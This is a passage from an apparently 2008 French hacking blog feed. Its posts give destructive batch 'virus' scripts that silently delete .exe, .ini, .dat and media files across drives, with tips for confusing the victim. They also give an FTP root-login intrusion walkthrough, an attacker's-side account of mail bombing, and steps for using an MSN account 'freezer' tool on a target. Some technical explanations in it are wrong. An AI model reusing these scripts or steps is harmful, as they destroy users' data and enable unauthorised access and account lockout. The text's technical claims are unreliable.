/&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;@echo off&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#009900;"&gt;C: windows&lt;/span&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.exe&lt;/span&gt; &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;--&gt; &lt;span style="color:#993399;"&gt;@ echo off&lt;/span&gt; : Signifie que la personne qui a reçu le virus ne verra pas ce qui est en train de se produire, il pourra toute fois entendre sont PC faire des bruits bizarres&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;--&gt; &lt;span style="color:#ff0000;"&gt;DEL&lt;/span&gt; : (racourci de delete en anglais) il sert à suprimer&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;--&gt;&lt;span style="color:#009900;"&gt;C: windows&lt;/span&gt; : Ceci situe l'endroit des choses à suprimer&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;--&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt; : Sert à designer tous les fichiers portant l'extansion qui la précède (dans l'example: exe)&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;--&gt; &lt;span style="color:#ff6600;"&gt;.exe&lt;/span&gt; : C'est l'extansion à suprimer ( peut être remplacée par &lt;span style="color:#ff6600;"&gt;.mp3&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.bmp&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.wma&lt;/span&gt;, tout dépend des fichiers que la personne désire supprimer)&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#666666;"&gt;Bon, ensute on approfondit un peut&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;@echo off&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.mp3&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.avi&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.wma&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ffff00;"&gt;cls&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;em&gt;Ici, &lt;span style="color:#ffff00;"&gt;CLS&lt;/span&gt; sert a effacer l'ecran pour perturber la victime et rendre encore plus dangereux le virus.&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;@echo off&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#009900;"&gt;C:/D:/E:&lt;/span&gt; &lt;span style="color:#ff6600;"&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;.mp3&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#009900;"&gt;C:/D:/E:&lt;/span&gt; &lt;span style="color:#ff6600;"&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;.avi&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#009900;"&gt;C:/D:/E:&lt;/span&gt; &lt;span style="color:#ff6600;"&gt;&lt;span style="color:#000099;"&gt;*&lt;/span&gt;.wma&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ffff00;"&gt;cls&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;em&gt;La, on a fait en sorte que le virus affecte les disques durs &lt;span style="color:#009900;"&gt;C, D, E,&lt;/span&gt; donc tout le PC (à moins que la victime ait des disques durs&lt;span style="color:#009900;"&gt; F, G, H,&lt;/span&gt; etc...)&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#000066;"&gt;Il est possible de remplacer &lt;span style="color:#009900;"&gt;C/D/E&lt;/span&gt; par &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#000066;"&gt;Dans ce cas &lt;span style="color:#9999ff;"&gt;%systemdrive% &lt;/span&gt;remplace tous les &lt;span style="color:#009900;"&gt;disques durs&lt;/span&gt; présent dans le PC de la victime&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;&lt;em&gt;Il est en suite possible de créer un virus déstructeur&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;@ echo off&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; &lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.exe&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; &lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.dat&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; &lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.GRF&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; &lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.cur&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; &lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.scr&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;del&lt;/span&gt; &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; &lt;span style="color:#000099;"&gt;*&lt;/span&gt;&lt;span style="color:#ff6600;"&gt;.ini&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ffff00;"&gt;cls&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3366ff;"&gt;&lt;em&gt;Dans ce cas &lt;span style="color:#993399;"&gt;@ echo off&lt;/span&gt; rendra invisible le démarrage du virus, &lt;span style="color:#ff0000;"&gt;DEL&lt;/span&gt; lancera une action de suppression, &lt;span style="color:#9999ff;"&gt;%systemdrive%&lt;/span&gt; pour circuler dans tous les &lt;span style="color:#009900;"&gt;DD&lt;/span&gt;, &lt;span style="color:#000099;"&gt;*&lt;/span&gt; pour affecter l'ensemble des extensions qui la précède, &lt;span style="color:#ff6600;"&gt;.exe&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.dat&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.grf&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.cur&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.scr&lt;/span&gt;, &lt;span style="color:#ff6600;"&gt;.ini&lt;/span&gt; pour effacer les fichiers portant ce type d'extension et &lt;span style="color:#ffff00;"&gt;CLS&lt;/span&gt; éteindra l'écran de la victime.&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Enfin, pour créer un virus, il faut impérativement que celui ci prenne le moins de place possible.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Et n'oubliez pas! Un PC coûte cher alors n'envoyez pas de virus...Merci&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4972328078927544838?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4972328078927544838/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/virus-creation-et-comprehension.html#comment-form' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4972328078927544838'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4972328078927544838'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/virus-creation-et-comprehension.html' title='Virus création et compréhension'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_f87oXEJfKnY/SSf1xHwy6SI/AAAAAAAABHg/DZhMWFAVXgk/s72-c/Copie+de+photodl_101721%5B1%5D.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-3275370338988073111</id><published>2008-11-03T13:52:00.000-08:00</published><updated>2009-03-06T07:56:27.600-08:00</updated><title type='text'>Intrusion par ftp</title><content type='html'>&lt;span style="font-size:180%;color:#ff0000;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:180%;color:#ff0000;"&gt;&lt;strong&gt;Intrusion par ftp&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ici nous allons apprendre comment hacker un site par le ftp se qui est de plus en plus rare car les serveurs son protégés...Et &lt;em&gt;"heureusement"&lt;/em&gt; pour nous.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Tout d'abord il faut aller dans le Menu démarrer ensuite clic sur exécuter puis tape ftp là une fenêtre MS-DOS s'ouvre et ça devrait ce présenter comme ça:&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;ftp&gt; &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Puis taper open puis l'adresse de ton site &lt;span style="color:#ff0000;"&gt;&lt;em&gt;sans le http://&lt;/em&gt;&lt;/span&gt; après taper : quote user ftp vous voyez ensuite une série de texte qui apparaît ensuite taper : quote cwd ~root vous voyez please login user and pass à ce moment vous taper : quote pass ftp si le serveur n'est pas protégé vous êtes dessus.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Voici les commandes :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Open:&lt;/span&gt; ouvre une session sur le site.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Mput:&lt;/span&gt; envoyer une liste de fichiers.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Mget:&lt;/span&gt; télécharger une liste de fichiers.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Put:&lt;/span&gt; Envoyer un fichier.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Get:&lt;/span&gt; prendre un fichier sur le site.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Delete:&lt;/span&gt; supprimer un fichier.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Rmdir:&lt;/span&gt; supprimer un répertoire.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Mkdir:&lt;/span&gt; crée un répertoire.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Cd:&lt;/span&gt; répertoire précédent.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Cd/:&lt;/span&gt; revenir a la racine.&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-3275370338988073111?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/3275370338988073111/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/intrusion-par-ftp.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/3275370338988073111'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/3275370338988073111'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/intrusion-par-ftp.html' title='Intrusion par ftp'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4181200248885687214</id><published>2008-11-03T13:45:00.000-08:00</published><updated>2009-03-06T07:57:30.861-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le Mail Bombarding'/><title type='text'>Le Mail Bombarding</title><content type='html'>&lt;span style="font-size:180%;color:#3333ff;"&gt;&lt;strong&gt;Le Mail Bombarding&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Le Mail Bombing consiste à envoyer un nombre faramineux d'emails (plusieurs milliers par exemple) à un ou des destinataires., dans le but de saturer le serveur de mails, la bande passante du serveur et du ou des destinataires, ou même de rendre impossible aux destinataires de continuer à utiliser l'adresse électronique !!&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;L'attaque&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Il est nécessaire pour l'auteur de l'attaque de se procurer un logiciel permettant de réaliser le mail bombing, des logiciels qui permettent à l'utilisateur de choisir :&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;* l'adresse qu'il veut faire apparaître en tant qu'émetteur du message&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;* le sujet du message&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;* le nombre de messages à envoyer&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;* le serveur de mail à partir duquel les messages seront émis, (bien souvent si les administrateurs de serveurs mails ne se protègent pas assez, des serveurs "innocents" servent de relais sans le savoir, et le danger pour leurs propriétaires est de se retrouver "black listés" c'est à dire voir son fournisseur d'accès internet lui couper sa connexion)&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;* le corps du message&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;* l'adresse email de la victime&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;&lt;em&gt;La possibilité d'y attacher une pièce jointe est une sérieuse menace, puisqu'elle permet à l'expéditeur d'insérer virus et troyens dans les messages. Une fois de plus, rappelons qu'il faut impérativement éviter d'ouvrir une pièce jointe ayant pour extension .com, .bat, .pif ou .exe...&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4181200248885687214?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4181200248885687214/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-mail-bombarding.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4181200248885687214'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4181200248885687214'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-mail-bombarding.html' title='Le Mail Bombarding'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4865220427249736401</id><published>2008-11-03T13:29:00.000-08:00</published><updated>2009-03-06T07:58:23.126-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le Freezer'/><title type='text'>Le Freezer</title><content type='html'>&lt;span style="font-size:180%;color:#3333ff;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:180%;color:#3333ff;"&gt;&lt;strong&gt;Le Freezer&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Une personne vous embête sur MSN? Vous voulez qu'il l'a boucle? &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Alors il n'y a q'une seule solution: &lt;span style="color:#3333ff;"&gt;&lt;em&gt;Le Freezer&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Ce sont de petits programmes permetent de bloquer l'adresse MSN de la victime. Mais quand je dis "bloquer", je veut dire par là qu'il ne pourra plus se connecter sur MSN, ne pourra plus accéder à sa boite mail et ne pourra plus utiliser aucun service MSN ou Windows Live!&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;La procédure est simple:&lt;/span&gt; &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Prenons comme exemple le Freezer "IceCold Reloaded". Dans la boite de texte "Hotmail ID", mettez l'adresse MSN de la cible, ensuite cliquez sur "Freeze Account" et lorsque le message "Account Frozen" s'affiche dans la barre nommée "Statut", alors c'est bon. Le compte sera bloqué !&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;em&gt;"A ne pas mettre dans toutes les mains"&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4865220427249736401?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4865220427249736401/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-freezer.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4865220427249736401'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4865220427249736401'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-freezer.html' title='Le Freezer'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-5515413432118250174</id><published>2008-11-03T13:17:00.000-08:00</published><updated>2009-03-06T07:59:12.763-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le RAT'/><title type='text'>Le RAT</title><content type='html'>&lt;span style="font-size:180%;color:#ff0000;"&gt;&lt;strong&gt;RAT &lt;/strong&gt;&lt;em&gt;(Remote Administration Tool)&lt;/em&gt;&lt;/span&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#cc33cc;"&gt;Définition :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Un RAT (Remote Administration Tool - Outil d'administration à distance) est un programme permettant la prise de contrôle totale, à distance, d'un ordinateur depuis un autre ordinateur. Il est constitué de deux parties : le "client" et le "serveur". Le "client" est installé sur l'ordinateur de celui qui prend le contrôle et le "serveur" est installé sur l'ordinateur contrôlé.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#cc33cc;"&gt;Description :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Grace à l'usage d'un RAT, une personne distante se retrouve dans une situation totalement identique à ce qu'elle serait si elle était devant la machine contrôlée. Son clavier devient le clavier de la machine distante, son écran devient l'écran de la machine distante, sa souris devient la souris de la machine distante etc. ... sans aucune limitation ni contrainte. Les seules limitations sont celles du profil du compte sous lequel est lancée la partie "serveur" :&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Sous un compte "Administrateur", la personne distante à tous les droits les plus étendus sur la machine contrôlée&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Sous un compte "Utilisateur Limité", la personne distante est limitée aux droits du compte limité sous lequel est lancé le serveur&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;La personne distante peut être à des centaines ou des milliers de kilomètres de la machine contrôlée. On conçoit donc que les RAT puissent constituer des agressions de la plus extrême gravité.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Autres noms (alias) :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Diverses erreurs d'usage et de transcription créent une grande confusion&lt;/em&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Terme admis :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Remote Administration Tool est le seul terme exact. Ses déclinaisons et abréviations correctes sont:&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Remote Administration Tools&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Remote Admin Tool&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Remote Admin Tools&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;RAT&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;RATs&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-5515413432118250174?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/5515413432118250174/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/5515413432118250174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/5515413432118250174'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html' title='Le RAT'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-8652915618244891934</id><published>2008-11-03T12:24:00.000-08:00</published><updated>2009-03-06T08:59:37.317-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Scanner de ports'/><title type='text'>Scanners de ports</title><content type='html'>&lt;span 